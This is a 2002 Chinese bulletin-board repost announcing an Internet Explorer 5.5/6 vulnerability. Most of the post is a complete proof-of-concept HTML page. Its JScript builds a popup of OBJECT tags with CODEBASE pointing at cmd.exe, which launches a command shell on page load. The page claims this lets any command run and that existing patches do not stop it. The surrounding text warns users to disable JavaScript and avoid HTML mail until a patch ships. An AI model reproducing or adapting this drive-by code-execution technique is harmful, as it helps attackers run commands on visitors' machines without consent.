荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: redsnow (红雪), 信区: NewSoftware
标 题: IE大漏洞 zz
发信站: BBS 水木清华站 (Thu Feb 21 00:45:45 2002)
下面代码保存成HTM文件,然后用IE打开运行一下。
强烈建议在补丁发布前,禁用javascript,或者使用Opera或者NetScape浏览器,
尽量不要
使用outlook (Express)打开html邮件.
====================================
<HTML>
<HEAD>
<TITLE>IE5.5&6漏洞</TITLE>
<style type="text/css">
BODY{font-family:Arial,Helvetica,sans-serif;font-size:16px;color:
#222222;
background-color:#aaaabb}
H1{background-color:#222222;color:#aaaabb}
</style>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<SCRIPT language=JScript>
var programName=new Array(
'c:/windows/system32/cmd.exe',
'c:/winnt/system32/cmd.exe',
'c:/cmd.exe'
);
function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html='';
for(n=0;n<programName.length;n++)
{
html+="<OBJECT NAME='X' CLASSID='CLSID:
11111111-1111-1111-1111-111111111111'";
html+=" CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
}
oPopBody.innerHTML=html;
oPopup.show(290, 190, 200, 200, document.body);
}
</SCRIPT>
</head>
<BODY onload="Init()">
看到打开的命令行窗口了吗?
这段javascript代码允许用户在IE中打开命令行窗口,执行任何有效命令,而且方
法极其
简单(各位看一下源代码就知道了)。
更重要的是,现今所知的各种补丁和省级程序,无论是IE的还是Windows的,都无
法防范这
一漏洞。
受此漏洞影响的操作系统包括Win2k和XP。这一漏洞已经正式提交微软,但要等这
一漏洞得
到解决,恐怕还需时日。
强烈建议在补丁发布前,禁用javascript,或者使用Opera或者NetScape浏览器,
尽量不要
使用outlook (Express)打开html邮件.
</BODY>
</HTML>
--
※ 来源:·BBS 水木清华站 smth.org·[FROM: 162.105.40.162]
--
※ 修改:·NetBIOS 於 Feb 21 20:06:31 修改本文·[FROM: 192.168.47.168]
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.47.168]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店